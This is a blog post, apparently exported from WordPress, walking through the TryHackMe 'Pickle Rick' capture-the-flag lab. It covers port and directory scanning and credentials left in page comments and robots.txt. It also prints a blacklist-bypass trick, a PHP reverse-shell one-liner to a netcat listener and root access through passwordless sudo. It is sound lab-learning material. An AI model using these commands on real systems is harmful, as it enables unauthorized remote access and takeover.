{"id":164,"date":"2023-03-25T11:35:48","date_gmt":"2023-03-25T16:35:48","guid":{"rendered":"https:\/\/binaryblisters.com\/?p=164"},"modified":"2023-04-14T15:34:26","modified_gmt":"2023-04-14T20:34:26","slug":"thm-pickle-rick-lab-walkthrough","status":"publish","type":"post","link":"https:\/\/binaryblisters.com\/?p=164","title":{"rendered":"Try Hack Me – Pickle Rick Lab Walkthrough"},"content":{"rendered":"\n

So, I decided I would give this a try and do a post on the latest lab I just completed. I know I’m one in a million, but I figured it would be good to keep track of my progress. This lab was part of a series on Web Vulnerabilities and was the final module I completed. Overall, I thought it was pretty good and compared to HTB, it was fairly easy. I only needed one hint throughout the lab, which I’ll cover in more detail further down in the post.<\/p>\n\n\n\n

So let’s go ahead and begin. To start, I used Gitbook to keep notes and also to help me keep notes when I’m working on labs. It’s extremely useful, and I highly recommend it. My first few notebooks looked like crap, but I’m getting better at organizing my findings and results.<\/p>\n\n\n\n

I went ahead and provided my OG notes from Gitbook below in case anyone wants to go through them. It’s a little chaotic but I’m getting better.<\/p>\n\n\n\n

https:\/\/sgtdiddlywink.gitbook.io\/thm\/<\/a><\/p>\n\n\n\n

\"\"
– Home page from the IP given on the activated machine.<\/figcaption><\/figure>\n\n\n\n

So long story short, there are three ingredients (Flags) located on Rick’s computer (Target Machine). Don’t get me wrong, the show is hilarious and my wife and I binge every season that comes out but for this write-up, I’m going to stick with the terminology of “Flags”, “Target Machine”, and “Host Machine”.<\/p>\n\n\n\n

Reconnaissance (I like to call it Scouting but that’s just me)<\/h2>\n\n\n\n

I first started by traveling to the IP given. In this writeup, we’ll just call it [TARGET IP].<\/p>\n\n\n\n

http:\/\/[TARGET IP]<\/strong><\/p>\n\n\n\n

This gives me the home page screen you see above and some basic information on the goal of the lab. Before I dive into any tools, I like to first look at the page source code for any possible nuggets of information. <\/p>\n\n\n\n

Right-Click –> View Page Source<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Right off the bat, we got some great intel. In the comments, the target has put a username: R1ckRul3s<\/strong><\/p>\n\n\n\n

I went ahead and checked Wappalyzer as well to confirm a Linux OS. Nothing to note on the backend language yet. This won’t bite me in the butt later.<\/p>\n\n\n\n

I decided to run some nmap scans for the heck of it to see if anything of note would pop up. I found that port 22 and 80 were open but the rest were closed which would make sense since this is a webapp lab.<\/p>\n\n\n\n

I ran the following to get more info on the versions:<\/p>\n\n\n\n

nmap -sC -sV -p 80,22 [TARGET IP]<\/code><\/pre>\n\n\n\n
nmap<\/td>nmap command to scan for open ports<\/td><\/tr>
-sC<\/td>Flag to perform basic scripts on open ports to gather more info<\/td><\/tr>
-sV<\/td>Flag to gather version information on services running on the open ports<\/td><\/tr>
-p 80, 22<\/td>Flag to designate which specific ports to scan. In this case ports 22 & 80<\/td><\/tr>
[TARGET IP]<\/td>The target IP address you want to scan<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
I’ll ignore port 22 for now as we are not exploring SSH but it looks like Port 80 is running an Apache WebServer which Wappalyzer also confirmed.<\/p>\n\n\n\n
I spent more time than what was needed to explore but will save you the trouble and tell you to move on to enumeration.<\/p>\n\n\n\n
Enumeration<\/h2>\n\n\n\n
My first go-to is always gobuster. <\/p>\n\n\n\n
gobuster dir -u http:\/\/[TARGET IP]\/ -w [PATH TO WORD LIST]<\/code><\/pre>\n\n\n\n
gobuster<\/td>gobuster command to enumerate for possible subdomains to a chosen URL<\/td><\/tr>
dir<\/td>Option to enumerate for directories<\/td><\/tr>
-u http:\/\/[TARGET IP]\/<\/td>Flag to specify the URL you are targeting<\/td><\/tr>
-w [PATH TO WORD LIST]<\/td>Flag to specify the location of the word list to use for enumeration<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So I found quite a few subdomains. I decided to explore them all to make sure I wasn’t missing anything.<\/p>\n\n\n\n
The two interesting subdomains were \/assets<\/strong> and \/robots.txt<\/strong>. The \/assets<\/strong> subdomain didn’t prove really useful as it only carried the basics of the website.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
The \/robots.txt<\/strong> was really interesting as it didn’t have the basic information you’d find in a robots.txt file. Instead, it only had one line of text:<\/p>\n\n\n\n
Wubbalubbadubdub<\/strong><\/p>\n\n\n\n
For those of you familiar with Rick and Morty I don’t need to explain this. For those who are not, here you go<\/a>.<\/p>\n\n\n\n
I figured they wouldn’t put it here for anything so I kept it in my notes and that is where I got stuck. I spent the next hour trying different enumerations and scoping the sites out and capturing packets with Burpsuite but still no luck. <\/p>\n\n\n\n
So, I looked up a hint and felt like an idiot afterward. I forgot to look into the backend scripting language. Hint for you all, it’s PHP.<\/p>\n\n\n\n
So now that I know that, I went back and ran another gobuster scan with the .php file extension to see what it would come up with.<\/p>\n\n\n\n
gobuster dir -u http:\/\/[TARGET IP]\/ -w [PATH TO WORD LIST] -x php<\/code><\/pre>\n\n\n\n
gobuster<\/td>gobuster command to enumerate possible subdomains to a chosen URL<\/td><\/tr>
dir<\/td>Option to enumerate for directories<\/td><\/tr>
-u http:\/\/[TARGET IP]\/<\/td>Flag to specify the URL you are targeting<\/td><\/tr>
-w [PATH TO WORD LIST]<\/td>Flag to specify the location of the word list to use for enumeration<\/td><\/tr>
-x php<\/td>Flag to that will append a file extension to each word from the wordlist. In this case, it is a .php<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Long behold, there is what I was looking for. A login page. I explored the other new subdomains but they all redirected to the \/login.php<\/strong> subdomain.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So this is where I got lucky. I already knew the username of R1ckRul3s<\/strong> from above but what about a password? Well, I always try “password” as a first guess. I know it probably won’t ever work but figured I’d give it a try anyway.<\/p>\n\n\n\n
It didn’t work, which was no surprise. I was about to start into the page’s source code but figured I’d give it another try at the password. I recalled the phrase that was on the \/robots.txt<\/strong> page Wubbalubbadubdub<\/strong>.<\/p>\n\n\n\n
What do you know, that was the password. Seems dumb and easy but this is supposed to be an easy lab so I’ll take it.<\/p>\n\n\n\n
Back to Scouting<\/h2>\n\n\n\n
After logging in, you get sent to the \/portal.php<\/strong> subdomain which works once you have a valid SessionID (You can go down that Burpsuite rabbit hole as I did but you won’t find anything useful).<\/p>\n\n\n\n
This page seems to have a command prompt to it which is kind of cool.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I first explored the page source code. <\/p>\n\n\n\n
Right-Click –> View Page Source<\/strong><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
You can skip this part if you want because it’s pointless but figured I’d tell you how I wasted too much time here. I saw that at the bottom of the page source, they had a commented-out line of text that suspiciously looked like Base64 encryption.<\/p>\n\n\n\n
Well, the last commented-out text I found in the page source was a password so this has to be something good right? Spoiler, it’s not.<\/p>\n\n\n\n
I went ahead and decrypted it with a Base64 decryptor<\/a>. I got gibberish back.<\/p>\n\n\n\n
I originally thought that maybe it wasn’t Base64 and I went off chasing other leads. After a bit more research I was positive that it was Base64. So for the fun of it, I decided why not just decrypt it over and over to see if anything pops up.<\/p>\n\n\n\n
After a few decryptions, I was about to give up but long behold after about the 5th or 6th decryption, I get the phrase rabbit hole. Which is exactly what I fell down and wasted a lot of time on. <\/p>\n\n\n\n
It was funny in an irritating way and sorry if you hung around to read that all but I wanted to share that little bit of annoyance with you all. For those wondering, I did plug it in in other areas throughout the exploration but never got anything back. Leave no stone unturned.<\/p>\n\n\n\n
So let’s get back on track.<\/p>\n\n\n\n
Back to the \/portal.php<\/strong> page, I tried the usual whoami<\/strong>, pwd<\/strong>, and ls<\/strong> in the command panel. That last one gave me what I needed.<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
It looks like the first ingredient is listed there. However, trying cat or head to see the file didn’t work due to a blacklist of commands on the backend. <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
That’s okay. We can work around that. After some trial and error, I found a few means to view the contents of the file.<\/p>\n\n\n\n
less Sup3rS3cretPickl3Ingred.txt<\/code><\/pre>\n\n\n\n
c'a't Sup3rS3cretPickl3Ingred.txt<\/code><\/pre>\n\n\n\n
It looks like not everything got blacklisted. I used a list of bypasses from PayloadsAllTheThings<\/a> to help with this.<\/p>\n\n\n\n
It looks like the first ingredient is mr.meeseek hair<\/strong>. Once again, for those who don’t know, here you go<\/a>.<\/p>\n\n\n\n
Next, I checked the clue.txt<\/strong> which was also listed with the same bypass:<\/p>\n\n\n\n
Look around the file system for the other ingredient.<\/strong><\/p>\n\n\n\n
I attempted to explore the rest of the site, including the tabs at the top but did not find anything to note other than disabled pages.<\/p>\n\n\n\n
Exploitation<\/h2>\n\n\n\n
I decided to start seeing what I could do with the command panel given on the \/portal.php<\/strong> subdomain.<\/p>\n\n\n\n
Not a whole lot as it looks like it restricts access to most things. So let’s see what PayloadsAllTheThings<\/a> has.<\/p>\n\n\n\n
I went down the list of possible exploits and finally got the following to work with a netcat listener on my Host Machine.<\/p>\n\n\n\n
On my Host Machine I started up the netcat listener for port 4444:<\/p>\n\n\n\n
nc -lvnp 4444<\/code><\/pre>\n\n\n\n
In the Command Panel of the \/portal.php<\/strong>:<\/p>\n\n\n\n
php -r '$sock=fsockopen(\"[HOST IP]\",4444);$proc=proc_open(\"\/bin\/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'<\/code><\/pre>\n\n\n\n
This gave me RCE to the Target Machine. Next, I wanted a more friendly interactive terminal so I used the following script to create one. Not necessary but helpful.<\/p>\n\n\n\n
python3 -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/code><\/pre>\n\n\n\n
I was just a user on the machine but still have access to quite a bit. After some browsing through the file system, I finally found the second ingredient in \/home\/rick <\/strong>–> 1 jerry tear<\/strong>.<\/p>\n\n\n\n
I explored more of the system as a regular user but wasn’t finding the third ingredient. I figured it had to be in one of the directories that are only available to root.<\/p>\n\n\n\n
I started browsing around for methods to escalate privileges. I tried a few methods but didn’t get anywhere and assumed I was making it more difficult than need be. So I backed up and simply tried the following to see what would happen”<\/p>\n\n\n\n
sudo su<\/code><\/pre>\n\n\n\n
And that was it. No password or anything else. I am now root.<\/p>\n\n\n\n
After a bit more exploration I found the third ingredient in the \/root\/3rd.txt<\/strong> file –> fleeb juice<\/strong>.<\/p>\n\n\n\n
That was it. Easy.<\/p>\n\n\n\n
Well, it took me about 6hrs to finish but that’s because I made it way more difficult than it needs to be. So, hopefully, this can help you. I linked my original notes to this lab at the top if you want to follow my entire methodology and thought process. Forewarning, there are a lot of dead ends and things I explored that was absolutely pointless.<\/p>\n\n\n\n
But that’s okay. It’s just how I work through a problem. So tell me how you did or if you did something differently.<\/p>\n\n\n\n
I appreciate you reading through this post and I’ll try to do more of these in the future. <\/p>\n\n\n\n
Thanks for reading,<\/p>\n\n\n\n
sgtdiddlywink<\/p>\n","protected":false},"excerpt":{"rendered":"
So, I decided I would give this a try and do a post on the latest lab I just completed. I know I’m one in a million, but I figured it would be good to keep track of my progress. This lab was part of a series on Web Vulnerabilities and was the final module […]<\/p>\n","protected":false},"author":1,"featured_media":175,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,48,49],"tags":[18,52,51,50],"class_list":["post-164","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-coding","category-hacking","category-thm","tag-hacking","tag-rickandmorty","tag-thm","tag-tryhackme"],"_links":{"self":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/164","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=164"}],"version-history":[{"count":2,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/164\/revisions"}],"predecessor-version":[{"id":256,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/posts\/164\/revisions\/256"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=\/wp\/v2\/media\/175"}],"wp:attachment":[{"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/binaryblisters.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}